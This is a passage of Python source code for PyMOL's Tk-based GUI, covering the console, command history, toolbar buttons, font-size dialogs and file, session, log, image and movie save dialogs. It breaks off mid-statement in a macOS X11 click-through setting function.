pad = ' ' # extra space in menus
appname = 'The PyMOL Molecular Graphics System'
appversion = '0.0.0.0' # will be set in __init__
copyright = ('Copyright (C) 2003-%d\n' % (time.localtime().tm_year,) +
'Schrodinger LLC.\n'+
'All rights reserved.')
contactweb = 'http://www.pymol.org'
contactemail = '[email protected]'
# responsible for setup and takedown of the normal skin
def _inc_fontsize(self, delta, font):
size = font.cget('size')
sign = -1 if size < 0 else 1
size = max(5, abs(size) + delta)
font.configure(size=size * sign)
def inc_fontsize(self, delta=1):
for name in tkFont.names():
self._inc_fontsize(delta, tkFont.nametofont(name))
def inc_fontsize_dialog(self):
dialog = Toplevel(self.root)
grid = dialog
kw = {'row': 0, 'sticky': 'w', 'padx': 5, 'pady': 5}
col = getattr(iter(range(5)), _next_method_name)
Button(grid, text=' - ', command=lambda: self.inc_fontsize(-1)).grid(column=col(), **kw)
Button(grid, text=' + ', command=lambda: self.inc_fontsize( 1)).grid(column=col(), **kw)
Label(grid, text='All GUI Font Sizes').grid(column=col(), **kw)
kw['row'] = 1
col = getattr(iter(range(5)), _next_method_name)
Button(grid, text=' - ', command=lambda: self._inc_fontsize(-1, self.fixedfont)).grid(column=col(), **kw)
Button(grid, text=' + ', command=lambda: self._inc_fontsize( 1, self.fixedfont)).grid(column=col(), **kw)
Label(grid, text='Output Font Size').grid(column=col(), **kw)
dialog.title('GUI Font Size')
@property
def initialdir(self):
'''
Be in sync with cd/pwd on the console until the first file has been
browsed, then remember the last directory.
'''
return self._initialdir or os.getcwd()
@initialdir.setter
def initialdir(self, value):
self._initialdir = value
def cd_dialog(self):
self.cmd.cd(encode(tkFileDialog.askdirectory(
title="Change Working Directory",
initialdir=self.initialdir)) or '.', quiet=0)
def complete(self,event):
st = self.cmd._parser.complete(self.command.get())
if st:
self.command.set(st)
self.entry.icursor(len(st))
return 'break'
def createDataArea(self):
# Create data area where data entry widgets are placed.
self.dataArea = self.app.createcomponent('dataarea',
(), None,
Frame, (self.app._hull,),
relief=SUNKEN,
bd=1)
self.dataArea.pack(side=LEFT, fill=BOTH, expand=YES,
padx=1, pady=1)
def destroyDataArea(self):
self.app.destroycomponent('dataarea')
def createCommandArea(self):
# Create a command area for application-wide buttons.
self.commandFrame = self.app.createcomponent('commandframe', (), None,
Frame,(self.app._hull,),relief=SUNKEN,bd=1)
self.commandFrame.place(width=500)
self.commandFrame.pack(side=TOP,
expand=NO,
fill=BOTH,
padx=1,
pady=1)
def destroyCommandArea(self):
self.app.destroycomponent('commandframe')
def createMessageBar(self):
self.messageBar = Pmw.MessageBar(self.commandFrame, entry_width = 25,
entry_relief='sunken', entry_borderwidth=1) #, labelpos = 'w')
self.abortButton=Button(self.commandFrame,
text='Rebuild',highlightthickness=0,
# state=DISABLED,
command=lambda s=self:self.rebuild(),padx=0,pady=0)
self.abortButton.pack(side=RIGHT,fill=BOTH,expand=YES)
self.messageBar.pack(side=BOTTOM, anchor=W, fill=X, expand=1)
self.balloon.configure(statuscommand = self.messageBar.helpmessage)
def destroyMessageBar(self):
self.messageBar.destroy()
def get_current_session_file(self):
session_file = self.cmd.get_setting_text("session_file")
session_file = session_file.replace("\\","/") # always use unix-like path separators
return session_file
def set_current_session_file(self, session_file):
session_file = session_file.replace("\\","/") # always use unix-like path separators
self.cmd.set("session_file",session_file)
def confirm_quit(self,e=None):
if self.cmd.get_setting_boolean("session_changed"):
session_file = self.get_current_session_file()
if session_file != '':
message = "Save the current session '%s'?"%os.path.split(session_file)[1]
else:
message = "Save the current session?"
check = tkMessageBox._show("Save Session", message,
tkMessageBox.QUESTION, tkMessageBox.YESNOCANCEL)
if check==tkMessageBox.YES:
if self.session_save():
self.quit_app()
elif check==tkMessageBox.NO:
self.quit_app()
else:
self.quit_app()
def quit_app(self):
self.cmd.log_close()
self.cmd.quit() # avoid logging this - it is inconvenient...
def buttonAdd(self,frame,text,cmmd):
newBtn=Button(frame,
text=text,highlightthickness=0,
command=cmmd,padx=0,pady=0)
newBtn.pack(side=LEFT,fill=BOTH,expand=YES)
return newBtn
def get_view(self):
self.cmd.get_view(2, quiet=0)
try:
str = self.cmd.get_view(3,quiet=1)
self.root.clipboard_clear()
self.root.clipboard_append(str)
self.last_view = str
self.app.selection_clear()
self.app.selection_own()
self.app.selection_handle(lambda a,b,s=self:s.last_view)
print(" PyMOL: Viewing matrix copied to clipboard.")
except:
traceback.print_exc()
def createButtons(self):
self.buttonArea = Frame(self.root)
self.buttonArea.pack(side=TOP, anchor=W)
row1 = self.app.createcomponent('row1', (), None,
Frame,self.commandFrame,bd=0)
row1.pack(side=TOP,fill=BOTH,expand=YES)
btn_reset = self.buttonAdd(row1,'Reset',lambda s=self: s.cmd.do("_ reset"))
btn_reset = self.buttonAdd(row1,'Zoom',lambda s=self: s.cmd.do("_ zoom animate=-1"))
btn_orient = self.buttonAdd(row1,'Orient',lambda s=self: s.cmd.do("_ orient animate=1"))
btn_rtrace = self.buttonAdd(row1,'Draw',lambda s=self: s.cmd.do("_ draw"))
btn_rtrace = self.buttonAdd(row1,'Ray',lambda s=self: s.cmd.do("_ ray async=1"))
row2 = self.app.createcomponent('row2', (), None,
Frame,self.commandFrame,bd=0)
row2.pack(side=TOP,fill=BOTH,expand=YES)
btn_unpick = self.buttonAdd(row2,'Unpick',lambda s=self: s.cmd.do("_ unpick"))
btn_hidesele = self.buttonAdd(row2,'Deselect', lambda: self.cmd.do("_ deselect"))
btn_reset = self.buttonAdd(row2,'Rock',lambda s=self: s.cmd.do("_ rock"))
btn_getview = self.buttonAdd(row2,'Get View',lambda s=self: s.get_view()) # doesn't get logged
row3 = self.app.createcomponent('row3', (), None,
Frame,self.commandFrame,bd=0)
row3.pack(side=TOP,fill=BOTH,expand=YES)
btn_rewind = self.buttonAdd(row3,'|<',lambda s=self: s.cmd.do("_ rewind"))
btn_back = self.buttonAdd(row3,'<',lambda s=self: s.cmd.do("_ backward"))
btn_stop = self.buttonAdd(row3,'Stop',lambda s=self: s.cmd.do("_ mstop"))
btn_play = self.buttonAdd(row3,'Play',lambda s=self: s.cmd.do("_ mplay"))
btn_forward = self.buttonAdd(row3,'>',lambda s=self: s.cmd.do("_ forward"))
btn_last = self.buttonAdd(row3,'>|',lambda s=self: s.cmd.do("_ ending"))
btn_ccache = self.buttonAdd(row3,'MClear',lambda s=self: s.cmd.do("_ mclear"))
row4 = self.app.createcomponent('row4', (), None,
Frame,self.commandFrame,bd=0)
row4.pack(side=TOP,fill=BOTH,expand=YES)
self.cmdB = self.buttonAdd(row4,'Command',
lambda s=self:
s.toggleFrame(s.cmdFrame))
self.buildB = self.buttonAdd(row4,'Builder',
lambda s=self:
s.toggleFrame(s.buildFrame))
self.volB = self.buttonAdd(row4, 'Volume',
self.newVolumeFrame)
# initialize disabled
self.volB.config(state=DISABLED)
def newVolumeFrame(self):
volumes = self.cmd.get_names_of_type("object:volume", public=1)
if not volumes:
return
if len(volumes) == 1:
self.cmd.volume_panel(volumes[0])
return
def callback():
sels = listbox.getcurselection()
if sels:
self.cmd.volume_panel(sels[0])
window.destroy()
title = 'Select a volume object'
window = Toplevel(self.app.root)
window.title(title)
listbox = Pmw.ScrolledListBox(window,
labelpos='nw',
label_text=title,
items=volumes,
selectioncommand=callback)
listbox.pack(padx=5, pady=5)
x, y = window.winfo_pointerxy()
window.geometry('+%d+%d' % (x - 20, y - 20))
def destroyButtonArea(self):
self.app.destroycomponent('row1')
self.app.destroycomponent('row2')
self.app.destroycomponent('row3')
self.app.destroycomponent('row4')
self.buttonArea.destroy()
def my_show(self,win,center=1):
if sys.platform!='linux2':
win.show()
else: # autocenter, deiconify, and run mainloop
# this is a workaround for a bug in the
# interaction between Tcl/Tk and common Linux
# window managers (namely KDE/Gnome) which causes
# an annoying 1-2 second delay in opening windows!
if center:
tw = win.winfo_reqwidth()+100
th = win.winfo_reqheight()+100
vw = win.winfo_vrootwidth()
vh = win.winfo_vrootheight()
x = max(0,(vw-tw)/2)
y = max(0,(vh-th)/2)
win.geometry(newGeometry="+%d+%d"%(x,y))
win.deiconify()
# win.show()
def my_withdraw(self,win):
if sys.platform!='linux2':
win.withdraw()
else:
win.destroy()
def my_activate(self,win,center=1,focus=None):
if sys.platform!='linux2':
win.activate()
else: # autocenter, deiconify, and run mainloop
# this is a workaround for a bug in the
# interaction between Tcl/Tk and common Linux
# window managers (namely KDE/Gnome) which causes
# an annoying 1-2 second delay in opening windows!
if center:
tw = win.winfo_reqwidth()+100
th = win.winfo_reqheight()+100
vw = win.winfo_vrootwidth()
vh = win.winfo_vrootheight()
x = max(0,(vw-tw)/2)
y = max(0,(vh-tw)/2)
win.geometry(newGeometry="+%d+%d"%(x,y))
win.deiconify()
if focus!=None:
focus.focus_set()
win.mainloop()
def my_deactivate(self,win):
if sys.platform!='linux2':
win.deactivate()
else: # autocenter, deiconify, and run mainloop
win.destroy()
def back_search(self, set0=False):
if not self.history_cur or set0:
self.history[0] = self.command.get()
for i in range(self.history_cur + 1, len(self.history)):
if self.history[i].startswith(self.history[0]):
self.history_cur = i
self.command.set(self.history[self.history_cur])
l = len(self.history[self.history_cur])
self.entry.icursor(l)
break
def back(self):
if not self.history_cur:
self.history[0] = self.command.get()
self.history_cur = (self.history_cur + 1) & self.history_mask
self.command.set(self.history[self.history_cur])
l = len(self.history[self.history_cur])
self.entry.icursor(l)
def forward(self):
if not self.history_cur:
self.history[0] = self.command.get()
self.history_cur = max(0, self.history_cur - 1) & self.history_mask
self.command.set(self.history[self.history_cur])
l = len(self.history[self.history_cur])
self.entry.icursor(l)
def doAsync(self,cmmd):
t = threading.Thread(target=_doAsync,args=(self.cmd,cmmd))
t.setDaemon(1)
t.start()
def doTypedCommand(self,cmmd):
if self.history[1] != cmmd:
self.history[0]=cmmd
self.history.insert(0,'') # always leave blank at 0
self.history.pop(self.history_mask+1)
self.history_cur = 0
t = threading.Thread(target=_doAsync,args=(self.cmd,cmmd,1))
t.setDaemon(1)
t.start()
def dump(self,event):
print(dir(event))
print(event.keysym, event.keycode)
def createConsole(self):
self.command = StringVar()
self.lineCount = 0
self.history_mask = 0xFF
self.history = [''] * (self.history_mask+1)
self.history_cur = 0
self.cmdFrame = Frame(self.dataArea)
self.buildFrame = Builder(self.app, self.dataArea)
self.toggleFrame(self.cmdFrame,startup=1)
self.entryFrame = Frame(self.cmdFrame)
self.entryFrame.pack(side=BOTTOM,expand=NO,fill=X)
self.entry_label = Label(self.entryFrame, text="PyMOL>", padx=1, pady=1, justify=RIGHT)
self.entry_label.pack(side=LEFT,expand=NO,fill=X)
self.entry = Entry(self.entryFrame, justify=LEFT, width=70,
textvariable=self.command)
self.entry.pack(side=LEFT,expand=YES,fill=X)
self.output = Pmw.ScrolledText(self.cmdFrame)
self.output.pack(side=TOP, fill=BOTH, expand=YES)
self.entry.bind('<Return>', lambda e, s=self:
(s.doTypedCommand(s.command.get()), s.command.set('')))
self.entry.bind('<Tab>', lambda e, s=self: s.complete(e))
self.entry.bind('<Up>', lambda e, s=self: s.back())
self.entry.bind('<Down>', lambda e, s=self: s.forward())
self.entry.bind('<Control-Up>', lambda e: self.back_search())
self.root.protocol("WM_DELETE_WINDOW", lambda s=self: s.confirm_quit())
self.log_file = "log.pml"
# self.entry = self.app.createcomponent('entry', (), None,
# Entry,
# (self.dataArea,),
# justify=LEFT,
# width=50,
### textvariable=self.command)
text = self.output.component('text')
self.text = text
if sys.platform.startswith('win'):
self.font = 'lucida console' # only available on windows
self.my_fw_font=(self.font,8)
self.fixedfont.configure(family=self.font, size=self.my_fw_font[1])
else:
text.tk.call('tk','scaling',1)
self.font = 'fixed' # should be available on any X11-based platform
self.my_fw_font=(self.font,10)
if sys.platform == 'darwin':
self.fixedfont.configure(size=11)
text.configure(width=74)
self.balloon.bind(self.entry, '''Command Input Area
Get the list of commands by hitting <TAB>
Get the list of arguments for one command with a question mark:
PyMOL> color ?
Read the online help for a command with "help":
PyMOL> help color
Get autocompletion for many arguments by hitting <TAB>
PyMOL> color ye<TAB> (will autocomplete "yellow")
''')
if self.app.allow_after:
self.output.after(100,self.update_feedback)
self.output.after(100,self.update_menus)
self.output.pack(side=BOTTOM,expand=YES,fill=BOTH)
self.app.bind(self.entry, 'Command Input Area')
self.app.bind_all('<F1>',lambda e,s=self: s.cmd.do("cmd._special(1,0,0)"))
self.app.bind_all('<F2>',lambda e,s=self: s.cmd.do("cmd._special(2,0,0)"))
self.app.bind_all('<F3>',lambda e,s=self: s.cmd.do("cmd._special(3,0,0)"))
self.app.bind_all('<F4>',lambda e,s=self: s.cmd.do("cmd._special(4,0,0)"))
self.app.bind_all('<F5>',lambda e,s=self: s.cmd.do("cmd._special(5,0,0)"))
self.app.bind_all('<F6>',lambda e,s=self: s.cmd.do("cmd._special(6,0,0)"))
self.app.bind_all('<F7>',lambda e,s=self: s.cmd.do("cmd._special(7,0,0)"))
self.app.bind_all('<F8>',lambda e,s=self: s.cmd.do("cmd._special(8,0,0)"))
self.app.bind_all('<F9>',lambda e,s=self: s.cmd.do("cmd._special(9,0,0)"))
self.app.bind_all('<F10>',lambda e,s=self: s.cmd.do("cmd._special(10,0,0)"))
self.app.bind_all('<F11>',lambda e,s=self: s.cmd.do("cmd._special(11,0,0)"))
self.app.bind_all('<F12>',lambda e,s=self: s.cmd.do("cmd._special(12,0,0)"))
self.app.bind_all('<Control-F1>',lambda e,s=self: s.cmd.do("cmd._special(1,0,0,2)"))
self.app.bind_all('<Control-F2>',lambda e,s=self: s.cmd.do("cmd._special(2,0,0,2)"))
self.app.bind_all('<Control-F3>',lambda e,s=self: s.cmd.do("cmd._special(3,0,0,2)"))
self.app.bind_all('<Control-F4>',lambda e,s=self: s.cmd.do("cmd._special(4,0,0,2)"))
self.app.bind_all('<Control-F5>',lambda e,s=self: s.cmd.do("cmd._special(5,0,0,2)"))
self.app.bind_all('<Control-F6>',lambda e,s=self: s.cmd.do("cmd._special(6,0,0,2)"))
self.app.bind_all('<Control-F7>',lambda e,s=self: s.cmd.do("cmd._special(7,0,0,2)"))
self.app.bind_all('<Control-F8>',lambda e,s=self: s.cmd.do("cmd._special(8,0,0,2)"))
self.app.bind_all('<Control-F9>',lambda e,s=self: s.cmd.do("cmd._special(9,0,0,2)"))
self.app.bind_all('<Control-F10>',lambda e,s=self: s.cmd.do("cmd._special(10,0,0,2)"))
self.app.bind_all('<Control-F11>',lambda e,s=self: s.cmd.do("cmd._special(11,0,0,2)"))
self.app.bind_all('<Control-F12>',lambda e,s=self: s.cmd.do("cmd._special(12,0,0,2)"))
self.entry.bind('<Prior>',lambda e,s=self: s.cmd.do("cmd._special(104,0,0)"))
self.entry.bind('<Next>',lambda e,s=self: s.cmd.do("cmd._special(105,0,0)"))
self.entry.bind('<Control-Prior>',lambda e,s=self: s.cmd.do("cmd._special(104,0,0,2)"))
self.entry.bind('<Control-Next>',lambda e,s=self: s.cmd.do("cmd._special(105,0,0,2)"))
self.entry.bind('<Home>',lambda e,s=self: s.cmd.do("cmd._special(106,0,0)"))
self.entry.bind('<End>',lambda e,s=self: s.cmd.do("cmd._special(107,0,0)"))
def update_feedback(self):
feedback = self.cmd._get_feedback(self.cmd)
if feedback!=None:
self.text.configure(state='normal')
for a in feedback:
self.output.insert(END,"\n")
self.output.insert(END,a)
self.output.see(END)
self.lineCount = self.lineCount + 1
if self.lineCount > 10000:
self.output.delete('0.0','%i.%i' % (self.lineCount-5000,0))
self.lineCount=5000
self.text.configure(state='disabled')
progress = self.cmd.get_progress()
if progress>=0.0:
# self.abortButton.config(state=NORMAL)
self.messageBar.message("busy","Progress %d%%..."%int(progress*100))
else:
# self.abortButton.config(state=DISABLED)
self.messageBar.resetmessages("busy")
if self.app.allow_after:
if feedback == None: # PyMOL busy, so try more aggressively to get lock
self.output.after(10,self.update_feedback) # 100X a second
else:
self.output.after(100,self.update_feedback) # 10X a second
def abort(self):
self.cmd.interrupt()
# self.abortButton.config(state=DISABLED)
def rebuild(self):
self.doAsync("_ rebuild")
def toggleFrame(self, frame, startup=0):
if frame not in self.dataArea.slaves():
# clear all frames in dataArea
for f in self.dataArea.slaves():
f.pack_forget()
# add requested frame to data area
frame.pack(side=BOTTOM, fill=BOTH, expand=YES)
else:
# clear frame from data area
if frame != self.cmdFrame:
frame.pack_forget()
# next command will cause command frame to be turned on if
# nothing else is visible... might not want this behavior
self.cmdFrame.pack(side=BOTTOM, fill=BOTH, expand=YES)
frame = self.cmdFrame
if not startup:
if frame == self.cmdFrame:
if self.edit_mode != None:
self.cmd.edit_mode(self.edit_mode)
self.edit_mode = None
if self.auto_overlay != None:
self.cmd.set("auto_overlay",self.auto_overlay)
self.auto_overlay = None
if self.valence != None:
self.cmd.set("valence",self.valence)
elif frame == self.buildFrame:
frame.deferred_activate()
if "Editing" not in self.cmd.get("button_mode_name"):
self.cmd.edit_mode(1)
self.edit_mode = 0
self.valence = self.cmd.get("valence")
self.cmd.set("valence","1")
self.auto_overlay = self.cmd.get("auto_overlay")
self.cmd.set("auto_overlay",1)
def update_menus(self):
self.setting.refresh()
if True:
# volume frame is closed, update the button
if len(self.cmd.get_names_of_type("object:volume",public=1))>0:
self.volB.config(state=NORMAL)
else:
self.volB.config(state=DISABLED)
# keep calling
if self.app.allow_after:
self.output.after(500,self.update_menus) # twice a second
def file_open(self,tutorial=0):
if not tutorial:
initdir = self.initialdir
ftypes = self.app.getLoadableFileTypes()
else:
initdir = os.environ['TUT']
# only list file extensions that are used for tutorial data
ftypes = [("Tutorial Data","*.pdb"),]
if TkVersion>8.3:
ofile_list = askopenfilename(initialdir = initdir,
filetypes=ftypes,
multiple=1) # new option in Tk 8.4
else:
ofile_list = [ askopenfilename(initialdir = initdir,
filetypes=ftypes) ]
for ofile in ofile_list:
if len(ofile):
if not tutorial:
self.initialdir = os.path.dirname(ofile)
if ofile[-4:].lower() == '.pse' and ofile != self.save_file:
self.save_file = '' # remove ambiguous default
self.cmd.do('_ /cmd.load(%s, quiet=0)' % repr(ofile))
def log_open(self):
sfile = asksaveasfilename(initialfile = self.log_file,
initialdir = self.initialdir,
filetypes=[
("PyMOL Script","*.pml"),
("PyMOL Program","*.pym"),
("Python Program","*.py"),
("All Files","*.*"),
("All Files","*"),
])
if len(sfile):
self.initialdir = os.path.dirname(sfile)
self.log_file = os.path.basename(sfile)
self.cmd.log_open(sfile)
def log_resume(self,append_only=0):
ofile = askopenfilename(initialdir = os.getcwd(),
filetypes=[("All Resumable","*.pml"),
("All Resumable","*.pym"),
("All Resumable","*.py"),
("PyMOL Script","*.pml"),
("PyMOL Program","*.pym"),
("Python Program","*.py"),
("All Files","*.*"),
("All Files","*"),
])
if len(ofile):
self.initialdir = os.path.dirname(ofile)
self.log_file = os.path.basename(ofile)
# os.chdir(self.initialdir)
self.cmd.resume(ofile)
def log_append(self,append_only=0):
ofile = askopenfilename(initialdir = os.getcwd(),
filetypes=[("All Appendable","*.pml"),
("All Appendable","*.pym"),
("All Appendable","*.py"),
("PyMOL Script","*.pml"),
("PyMOL Program","*.pym"),
("Python Program","*.py"),
("All Files","*.*"),
("All Files","*"),
])
if len(ofile):
self.initialdir = os.path.dirname(ofile)
self.log_file = os.path.basename(ofile)
# os.chdir(self.initialdir)
self.cmd.log_open(ofile,'a')
def session_save(self):
self.save_file = self.get_current_session_file()
if self.save_file!='':
self.cmd.log("save %s,format=pse\n"%(self.save_file),
"cmd.save('%s',format='pse')\n"%(self.save_file))
# self.cmd.save(self.save_file,"","pse",quiet=0)
# self.cmd.set("session_changed",0)
self.cmd.do("_ cmd.save('''%s''','','pse',quiet=0)"%self.save_file) # do this in the main thread to block cmd.quit, etc.
self.cmd.do("_ cmd.set('session_changed',0)")
return 1
else:
return self.session_save_as()
def session_save_as(self):
(self.initialdir, self.save_file) = os.path.split(self.get_current_session_file())
(save_file, def_ext) = os.path.splitext(self.save_file)
sfile = asksaveasfilename(defaultextension = _def_ext(def_ext),
initialfile = save_file,
initialdir = self.initialdir,
filetypes=[
("PyMOL Session File","*.pse"),
("PyMOL Show File","*.psw"),
])
if len(sfile):
if re.search(r"\.pse$|\.PSE$|\.psw$|\.PSW$",sfile)==None:
sfile=sfile+".pse"
self.initialdir = os.path.dirname(sfile)
self.cmd.log("save %s,format=pse\n"%(sfile),
"cmd.save('%s',format='pse')\n"%(sfile))
# self.cmd.save(sfile,"",format='pse',quiet=0)
# self.cmd.set("session_changed",0)
self.save_file = sfile
# self.cmd.set("session_file",self.save_file)
self.set_current_session_file(self.save_file)
# do this in the main thread to block cmd.quit, etc.
self.cmd.do("_ cmd.save('''%s''','','pse',quiet=0)"%self.save_file)
self.cmd.do("_ cmd.set('session_changed',0)")
return 1
else:
return 0
def file_save(self):
"""
File->Save Molecule, now with filtering
"""
def command(result):
if result == 'OK':
self.file_save2(
dialog.getcurselection(),
multiple_files_option.getvalue(),
states_option.getvalue())
self.my_withdraw(dialog)
def update_save_listbox():
lst = self.cmd.get_names('public')
searchstr = filter_entry.getvalue()
if searchstr:
lst = [x for x in lst if searchstr in x]
dialog.component("scrolledlist").setlist(lst)
dialog = Pmw.SelectionDialog(self.root,
title="Save",
buttons = ('OK', 'Cancel'),
defaultbutton='OK',
scrolledlist_labelpos=N,
scrolledlist_listbox_selectmode=EXTENDED,
label_text='Which object or selection would you like to save?',
scrolledlist_items = (), # used to be 'lst'
command = command)
filter_entry = Pmw.EntryField(dialog.interior(),
labelpos='w',
modifiedcommand=update_save_listbox,
validate=None,
value="",
label_text="Filter:")
filter_entry.pack(pady=6, fill='x', expand=0, padx=10)
multiple_files_option = Pmw.RadioSelect( dialog.interior(),
labelpos='w',
orient='vertical',
selectmode='single',
label_text="Save to...",
buttontype="radiobutton",
)
multiple_files_option.add("one file")
multiple_files_option.add("multiple files")
multiple_files_option.invoke("one file")
multiple_files_option.pack(side='left', pady=8)
states_option = Pmw.RadioSelect( dialog.interior(),
labelpos='w',
orient='vertical',
selectmode='single',
label_text='Saved state...',
buttontype="radiobutton"
)
states_option.add("all")
states_option.add("global")
states_option.add("object's current")
states_option.invoke("global")
states_option.pack(side='right', pady=8)
# The listbox is created empty. Fill it now.
update_save_listbox()
if len(dialog.component('scrolledlist').get()):
# set focus on the first item
listbox = dialog.component('scrolledlist')
listbox.selection_set(0)
self.my_show(dialog)
def file_save2(self, sels, multiple_files_flag, state_flag):
filetypes_save = [
("PDB File","*.pdb"),
("MOL File","*.mol"),
("MOL2 File","*.mol2"),
("MMD File","*.mmd"),
("PKL File","*.pkl"),
("SDF File","*.sdf"),
("PDBx/mmCIF","*.cif"),
("PQR","*.pqr"),
("Maestro","*.mae"),
("XYZ","*.xyz"),
]
if True:
# save N>1 objects to ONE file
if multiple_files_flag == "one file" and len(sels)>=1:
sfile = '_'.join(sels) if len(sels) < 3 else \
sels[0] + '-and-%d-more' % (len(sels) - 1)
sfile = asksaveasfilename(defaultextension = _def_ext(".pdb"),
initialfile = sfile,
initialdir = self.initialdir,
filetypes=filetypes_save)
if len(sfile):
# maybe use PDBSTRs for saving multiple files to multiple states
self.initialdir = os.path.dirname(sfile)
save_sele = ' or '.join(["("+str(x)+")" for x in sels])
self.cmd.log("save %s,(%s)\n"%(sfile,save_sele),
"cmd.save('%s','(%s)')\n"%(sfile,save_sele))
if state_flag == "all":
self.cmd.save(sfile,"(%s)"%save_sele,state=0,quiet=0)
elif state_flag == "object's current":
ap = 0
for sel in sels:
s = int(self.cmd.get("state", str(sel)))
self.cmd.multisave(sfile,str(sel),state=s, quiet=0, append=ap)
ap = 1
else:
self.cmd.save(sfile,"(%s)"%save_sele,quiet=0)
return
else:
# save to many files
for curName in sels:
## print "Result is: ", result
## print "Sels is: ", sels
## print "CurName is: ", curName
## print "State flag is: ", state_flag
# The only special case for saving files is when the user selects a multi-state object
# and wants to save that to multiple files, each state in one file.
doSplit=False
if state_flag=='all':
stateSave = "0"
if len(sels)==1:
# print "User wants to split a file"
doSplit=True
elif state_flag=='global':
stateSave = self.cmd.get_state()
elif state_flag=="object's current":
stateSave = int(self.cmd.get("state",curName))
# print "Saving curren't object's state as: ", stateSave
else: # default to current global
stateSave = "state=", self.cmd.get_state()
if True:
sfile = asksaveasfilename(defaultextension = _def_ext(".pdb"),
initialfile = curName,
initialdir = self.initialdir,
filetypes = filetypes_save)
# now save the file (customizing states as necessary)
# print "sfile is: ", sfile
if len(sfile):
# maybe use PDBSTRs for saving multiple files to multiple states
self.initialdir = os.path.dirname(sfile)
save_sele = str("("+curName+")")
if doSplit:
# save each state in "save_sele" to file "sfile" as 'sfile_stateXYZ.pdb'
s = self.cmd.count_states(save_sele)
for stateSave in range(1,int(s)+1):
save_file = sfile
# _state004
inter = "_state" + str(stateSave).zfill(len(str(s))+1)
# g either MATCHES *.pdb or not. If so, save, name_stateXYZ.pdb
g = re.search("(.*)(\..*)$", save_file)
if g!=None:
# 1PDB_state004.pdb
save_file = g.groups()[0] + inter + g.groups()[1]
else:
# user entered a file w/o an extension name: eg, '1abc'
# this saves to, '1abc_state00XYZ'
save_file = save_file + inter
self.cmd.log("save %s,(%s)\n"%(save_file,save_sele),
"cmd.save('%s','(%s)', state='%s')\n"%(save_file,save_sele,stateSave))
self.cmd.save(save_file,"(%s)"%save_sele,state=stateSave,quiet=0)
else:
save_file = sfile
# just save current selection to one file
self.cmd.log("save %s,(%s)\n"%(save_file,save_sele),
"cmd.save('%s','(%s)', state='%s')\n"%(save_file,save_sele,stateSave))
self.cmd.save(save_file,"(%s)"%save_sele,state=stateSave,quiet=0)
def edit_pymolrc(self):
from pmg_tk import TextEditor
TextEditor.edit_pymolrc(self)
def file_run(self):
ofile = askopenfilename(initialdir = os.getcwd(),
filetypes=[("All Runnable","*.pml"),
("All Runnable","*.pym"),
("All Runnable","*.py"),
("All Runnable","*.pyc"),
("PyMOL Script","*.pml"),
("Python Program","*.py"),
("Python Program","*.pyc"),
("PyMOL Program","*.pym"),
("All Files","*.*"),
("All Files","*"),
])
if len(ofile):
self.__script__ = ofile
if re.search("\.pym*$|\.PYM*$",ofile):
self.cmd.do("run "+ofile);
else:
self.cmd.do("@"+ofile);
def file_save_png(self):
sfile = asksaveasfilename(defaultextension = _def_ext(".png"),
initialdir = self.initialdir,
filetypes=[("PNG File","*.png")])
if len(sfile):
self.initialdir = os.path.dirname(sfile)
self.cmd.log("png %s\n"%sfile,"cmd.png('%s')\n"%sfile)
self.cmd.png(sfile,quiet=0)
def file_save_wrl(self):
sfile = asksaveasfilename(defaultextension = _def_ext(".wrl"),
initialdir = self.initialdir,
filetypes=[("VRML 2 WRL File","*.wrl")])
if len(sfile):
self.initialdir = os.path.dirname(sfile)
self.cmd.log("save %s\n"%sfile,"cmd.save('%s')\n"%sfile)
self.cmd.save(sfile,quiet=0)
def file_save_dae(self):
sfile = asksaveasfilename(defaultextension = _def_ext(".dae"),
initialdir = self.initialdir,
filetypes=[("COLLADA File","*.dae")])
if len(sfile):
self.initialdir = os.path.dirname(sfile)
self.cmd.log("save %s\n"%sfile,"cmd.save('%s')\n"%sfile)
self.cmd.save(sfile,quiet=0)
def file_save_pov(self):
sfile = asksaveasfilename(defaultextension = _def_ext(".pov"),
initialdir = self.initialdir,
filetypes=[("POV File","*.pov")])
if len(sfile):
self.initialdir = os.path.dirname(sfile)
self.cmd.log("save %s\n"%sfile,"cmd.save('%s')\n"%sfile)
self.cmd.save(sfile,quiet=0)
def file_save_mpeg(self):
try:
from freemol import mpeg_encode
if not mpeg_encode.validate():
print("produce-error: Unable to validate freemol.mpeg_encode")
raise
except:
tkMessageBox.showerror("Error",
"MPEG encoder missing.\nThe FreeMOL add-ons may not be installed.")
return
else:
sfile = asksaveasfilename(defaultextension = _def_ext(".mpg"),
initialdir = self.initialdir,
filetypes=[("MPEG movie file","*.mpg")])
if len(sfile):
self.initialdir = os.path.dirname(sfile)
mQual = self.cmd.get_setting_int("movie_quality")
self.cmd.log("movie.produce %s,quality=%d,quiet=0\n"%(sfile,mQual),
"cmd.movie.produce('''%s''',quality=%d,quiet=0)\n"%(sfile,mQual))
self.cmd.movie.produce(sfile,quality=mQual, quiet=0) #quality=quality
def file_save_mpng(self):
sfile = asksaveasfilename(initialdir = self.initialdir,
filetypes=[("Numbered PNG Files","*.png")])
if len(sfile):
self.initialdir = os.path.dirname(sfile)
self.cmd.log("mpng %s\n"%sfile,"cmd.mpng('%s')\n"%sfile)
self.cmd.mpng(sfile,modal=-1)
def mvprg(self, command=None):
if command != None:
if command == -1:
self.cmd.do("_ mdelete -1,%d"%self.movie_start)
command = None
else:
command = str(command)
self.movie_start = (self.cmd.get_movie_length()+1)
command = command % self.movie_start
self.movie_command = command
self.cmd.do("_ ending")
else:
command = self.movie_command
if command != None:
self.cmd.do(command)
def mvprg_scene_loop(self, pause, rock, angle):
def func():
cmd = self.cmd
start = cmd.get_movie_length() + 1
cmd.ending()
cmd.set('sweep_angle', angle)
cmd.movie.add_scenes(None, pause, rock=rock, start=start)
return func
def transparency_menu(self,name,label,setting_name):
self.menuBar.addcascademenu('Transparency', name, label, label=label)
var = getattr(self.setting, setting_name)
for lab, val in [ ('Off', 0.0), ('20%', 0.2), ('40%', 0.4),
('50%', 0.5), ('60%', 0.6), ('80%', 0.8) ]:
self.menuBar.addmenuitem(name, 'radiobutton', label=lab, value=val, variable=var)
def cat_terms(self):
for path in [ "$PYMOL_PATH/LICENSE.txt", "$PYMOL_PATH/LICENSE.TXT", "$PYMOL_PATH/LICENSE" ]:
path = self.pymol.cmd.exp_path(path)
if os.path.exists(path):
print(open(path).read().strip())
return
print(" Error: no license terms found.")
def toggleClickThrough(self, toggle):
if toggle:
os.system(
"defaults write com.apple.x11 wm_click_through -bool true")
os.system(
"defaults write org.x.X11 wm_click_through -bool true")
os.system(
